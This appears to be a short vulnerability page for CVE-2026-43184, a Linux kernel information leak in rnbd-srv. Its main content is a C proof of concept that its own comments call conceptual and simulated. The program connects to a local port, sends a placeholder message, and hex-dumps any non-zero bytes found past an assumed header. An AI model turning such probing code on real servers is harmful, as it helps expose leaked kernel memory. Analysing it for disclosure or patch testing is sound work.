CVE-2026-43184: Linux内核信息泄露漏洞

/* * Conceptual PoC for CVE-2026-43184 * This PoC simulates a client interacting with a vulnerable rnbd-srv server * to detect uninitialized memory bytes in the response. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <arpa/inet.h> #define RNB_SRV_PORT 12345 // Hypothetical port #define BUFFER_SIZE 4096 int main(int argc, char *argv[]) { int sock; struct sockaddr_in server; char message[32]; char server_reply[BUFFER_SIZE]; // Create socket sock = socket(AF_INET, SOCK_STREAM, 0); if (sock == -1) { perror("Could not create socket"); return 1; } server.sin_addr.s_addr = inet_addr("127.0.0.1"); server.sin_family = AF_INET; server.sin_port = htons(RNB_SRV_PORT); // Connect to vulnerable server if (connect(sock, (struct sockaddr *)&server, sizeof(server)) < 0) { perror("Connection failed"); return 1; } printf("[+] Connected to target\n"); // Send a request that triggers a response // The specific message format depends on the RNBD protocol strcpy(message, "INIT_MSG"); if (send(sock, message, strlen(message), 0) < 0) { perror("Send failed"); return 1; } // Receive response int received_size = recv(sock, server_reply, BUFFER_SIZE, 0); if (received_size < 0) { perror("Receive failed"); return 1; } printf("[+] Received %d bytes\n", received_size); // Check for non-zero bytes in the padding area (simulated check) // Assuming the header is 16 bytes, check the rest for stray data int header_size = 16; if (received_size > header_size) { int leak_found = 0; for (int i = header_size; i < received_size; i++) { if (server_reply[i] != 0) { leak_found = 1; break; } } if (leak_found) { printf("[!] Potential memory leak detected in response buffer!\n"); printf("[!] Raw Hex Dump:\n"); for (int i = 0; i < received_size; i++) { printf("%02x ", (unsigned char)server_reply[i]); if ((i + 1) % 16 == 0) printf("\n"); } } else { printf("[-] Buffer appears zeroed (Target patched)\n"); } } close(sock); return 0; }